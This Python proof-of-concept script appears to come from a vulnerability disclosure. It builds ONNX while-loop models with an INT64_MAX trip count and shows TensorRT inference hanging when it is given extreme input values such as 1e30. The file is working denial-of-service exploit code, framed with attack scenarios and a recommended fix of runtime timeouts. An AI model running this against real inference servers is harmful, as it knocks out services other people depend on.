File size: 11,372 Bytes
b057c21 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 | """
VULN-004 PoC: TensorRT Input-Controlled Denial of Service via While-Loop Models
A structurally valid ONNX model using a condition-dependent Loop operator hangs
indefinitely during inference when given a malicious input value. The model itself
is indistinguishable from a legitimate while-loop model.
This is DISTINCT from VULN-003 (static Loop trip count):
- VULN-003: Malicious MODEL with INT64_MAX max_trip_count -> always hangs
- VULN-004: Normal MODEL + malicious INPUT -> hangs based on input value
- VULN-003 fix (validate max_trip_count at build) does NOT prevent VULN-004
- VULN-004 requires runtime protection (inference timeout / iteration budget)
Attack scenarios:
1. Production model uses while-loop for variable-length processing
2. Attacker sends input with extreme counter value (e.g., 1e30)
3. Inference hangs indefinitely — DoS on the inference server
4. Affects TensorRT-LLM (autoregressive generation uses loops)
5. Affects any TRT model with data-dependent loop termination
Impact:
- Any TRT model using condition-dependent loops is vulnerable
- Attacker only needs to craft the INPUT, not the model
- Tiny payload (single float32 value) causes permanent hang
- No inference timeout in execute_async_v3()
"""
import os
import sys
import time
import subprocess
import numpy as np
import onnx
from onnx import helper, TensorProto, numpy_helper
POC_DIR = os.path.dirname(os.path.abspath(__file__))
def create_while_loop_model():
"""Create a LEGITIMATE while-loop model that counts down a counter.
This is a common pattern in ML models for variable-length processing.
The model decrements a counter each iteration, stopping when it reaches 0.
With a normal counter (e.g., 10), it runs 10 iterations and returns 0.
With a malicious counter (e.g., 1e30), it hangs for astronomical time.
"""
# Loop body: decrement counter, check if > 0
body = helper.make_graph(
[
# x_out = x_in - 1.0
helper.make_node('Sub', ['x_in', 'one'], ['x_out']),
# cond_out = (x_out > 0.0)
helper.make_node('Greater', ['x_out', 'zero'], ['cond_out']),
],
'while_body',
[helper.make_tensor_value_info('i', TensorProto.INT64, []),
helper.make_tensor_value_info('cond_in', TensorProto.BOOL, []),
helper.make_tensor_value_info('x_in', TensorProto.FLOAT, [])],
[helper.make_tensor_value_info('cond_out', TensorProto.BOOL, []),
helper.make_tensor_value_info('x_out', TensorProto.FLOAT, [])],
[numpy_helper.from_array(np.array(1.0, dtype=np.float32), 'one'),
numpy_helper.from_array(np.array(0.0, dtype=np.float32), 'zero')]
)
# Main graph: Loop with max_trip=INT64_MAX, condition-dependent termination
X = helper.make_tensor_value_info('counter', TensorProto.FLOAT, [])
Y = helper.make_tensor_value_info('output', TensorProto.FLOAT, [])
# max_trip_count is INT64_MAX but the loop is expected to terminate via condition
max_trip = numpy_helper.from_array(
np.array(0x7FFFFFFFFFFFFFFF, dtype=np.int64), 'max_trip'
)
cond_init = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')
loop = helper.make_node(
'Loop', ['max_trip', 'cond_init', 'counter'], ['output'],
body=body
)
graph = helper.make_graph([loop], 'while_loop', [X], [Y], [max_trip, cond_init])
model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
model.ir_version = 7
return model
def create_accumulator_model():
"""A more realistic model: accumulates values until threshold is reached.
Simulates a model that processes elements until a running sum exceeds a target.
With normal input (target=100), terminates quickly.
With malicious input (target=1e38), hangs effectively forever.
"""
body = helper.make_graph(
[
# acc_out = acc_in + step
helper.make_node('Add', ['acc_in', 'step'], ['acc_out']),
# cond_out = (acc_out < target_in)
helper.make_node('Less', ['acc_out', 'target_in'], ['cond_out']),
],
'accum_body',
[helper.make_tensor_value_info('i', TensorProto.INT64, []),
helper.make_tensor_value_info('cond_in', TensorProto.BOOL, []),
helper.make_tensor_value_info('acc_in', TensorProto.FLOAT, []),
helper.make_tensor_value_info('target_in', TensorProto.FLOAT, [])],
[helper.make_tensor_value_info('cond_out', TensorProto.BOOL, []),
helper.make_tensor_value_info('acc_out', TensorProto.FLOAT, []),
helper.make_tensor_value_info('target_in', TensorProto.FLOAT, [])],
[numpy_helper.from_array(np.array(1.0, dtype=np.float32), 'step')]
)
acc_init = helper.make_tensor_value_info('init_value', TensorProto.FLOAT, [])
target = helper.make_tensor_value_info('target', TensorProto.FLOAT, [])
acc_out = helper.make_tensor_value_info('final_acc', TensorProto.FLOAT, [])
target_out = helper.make_tensor_value_info('target_passthrough', TensorProto.FLOAT, [])
max_trip = numpy_helper.from_array(
np.array(0x7FFFFFFFFFFFFFFF, dtype=np.int64), 'max_trip'
)
cond_init = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')
loop = helper.make_node(
'Loop', ['max_trip', 'cond_init', 'init_value', 'target'],
['final_acc', 'target_passthrough'],
body=body
)
graph = helper.make_graph(
[loop], 'accumulator',
[acc_init, target],
[acc_out, target_out],
[max_trip, cond_init]
)
model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
model.ir_version = 7
return model
def build_engine(model_path, engine_path):
"""Build TensorRT engine from ONNX model."""
import tensorrt as trt
logger = trt.Logger(trt.Logger.WARNING)
builder = trt.Builder(logger)
network = builder.create_network(
1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
)
parser = trt.OnnxParser(network, logger)
if not parser.parse_from_file(model_path):
for i in range(parser.num_errors):
print(f" Parse error: {parser.get_error(i)}")
return False
config = builder.create_builder_config()
config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 24)
serialized = builder.build_serialized_network(network, config)
if not serialized:
print(" Build failed")
return False
with open(engine_path, 'wb') as f:
f.write(bytes(serialized))
return True
def test_inference(engine_path, counter_value, timeout=15):
"""Run inference with a specific counter value."""
script = f'''
import tensorrt as trt, torch, sys, time
with open(r"{engine_path}", "rb") as f:
data = f.read()
logger = trt.Logger(trt.Logger.ERROR)
runtime = trt.Runtime(logger)
engine = runtime.deserialize_cuda_engine(data)
if not engine:
print("DESER_FAIL"); sys.exit(1)
context = engine.create_execution_context()
device = torch.device("cuda:0")
counter = torch.tensor({counter_value}, dtype=torch.float32, device=device)
output = torch.empty(1, dtype=torch.float32, device=device)
context.set_tensor_address("counter", counter.data_ptr())
context.set_tensor_address("output", output.data_ptr())
stream = torch.cuda.current_stream()
print("INFERENCE_STARTED")
sys.stdout.flush()
start = time.time()
context.execute_async_v3(stream.cuda_stream)
stream.synchronize()
elapsed = time.time() - start
print(f"DONE time={{elapsed:.3f}}s output={{output.item():.1f}}")
'''
start = time.time()
try:
r = subprocess.run(
[sys.executable, "-c", script],
capture_output=True, text=True, timeout=timeout
)
elapsed = time.time() - start
return False, elapsed, r.stdout.strip(), r.returncode
except subprocess.TimeoutExpired:
elapsed = time.time() - start
return True, elapsed, "TIMEOUT", -1
def main():
print("=" * 70)
print("VULN-004: Input-Controlled DoS via While-Loop Models")
print("=" * 70)
# Step 1: Create the while-loop model
model = create_while_loop_model()
onnx_path = os.path.join(POC_DIR, "while_loop.onnx")
with open(onnx_path, 'wb') as f:
f.write(model.SerializeToString())
onnx_size = os.path.getsize(onnx_path)
print(f"\n[1] While-loop ONNX model: {onnx_path}")
print(f" Size: {onnx_size} bytes")
print(f" Behavior: Counts down from input value to 0")
print(f" Structure: Perfectly valid -- common ML pattern")
# Step 2: Build TensorRT engine
engine_path = os.path.join(POC_DIR, "while_loop.engine")
print(f"\n[2] Building TensorRT engine...")
if not build_engine(onnx_path, engine_path):
print(" ERROR: Build failed")
sys.exit(1)
engine_size = os.path.getsize(engine_path)
print(f" Engine: {engine_path}")
print(f" Size: {engine_size} bytes")
print(f" Build completed normally -- model is structurally valid")
# Step 3: Normal usage (benign inputs)
print(f"\n[3] Normal inference with benign inputs")
for counter_val in [10, 100, 1000]:
hung, elapsed, out, rc = test_inference(engine_path, float(counter_val), timeout=10)
lines = out.split('\n')
result = lines[-1] if lines else f"rc={rc}"
print(f" counter={counter_val:>6d}: {result} ({elapsed:.2f}s)")
# Step 4: DoS attack (malicious input)
print(f"\n[4] DoS attack with malicious inputs")
for counter_val, desc in [
(1e6, "1 million iterations"),
(1e9, "1 billion iterations"),
(1e15, "1 quadrillion iterations"),
(1e30, "1e30 iterations (astronomical)"),
(3.4e38, "FLT_MAX iterations (maximum float32)"),
]:
hung, elapsed, out, rc = test_inference(engine_path, counter_val, timeout=15)
if hung:
print(f" counter={counter_val:>12.0e}: TIMEOUT after {elapsed:.1f}s — HANGING")
else:
lines = out.split('\n')
result = lines[-1] if lines else f"rc={rc}"
print(f" counter={counter_val:>12.0e}: {result} ({elapsed:.1f}s)")
# Step 5: Show the attack is input-dependent
print(f"\n[5] Same model, same engine — behavior depends entirely on input")
print(f" counter=10 -> completes instantly (10 iterations)")
print(f" counter=1e30 -> hangs for 1e30 iterations")
print(f" At 1 billion iterations/sec: 3.17e13 YEARS")
# Summary
print(f"\n{'='*70}")
print("VULNERABILITY SUMMARY")
print(f"{'='*70}")
print(f"[!!!] Input-controlled DoS via while-loop model")
print(f"[!!!] Model is structurally VALID — cannot be detected by static analysis")
print(f"[!!!] ONNX size: {onnx_size} bytes | Engine size: {engine_size} bytes")
print(f"[!!!] DoS triggered by input value, NOT by model structure")
print(f"[!!!] VULN-003 fix (validate max_trip_count) does NOT prevent this")
print(f"[!!!] Requires runtime protection: inference timeout / iteration budget")
print(f"[!!!] Affects any TRT model using data-dependent loops")
print(f"[!!!] Relevant to TensorRT-LLM autoregressive generation")
# Cleanup temp files
# Keep the while_loop files as evidence
if __name__ == "__main__":
main()
|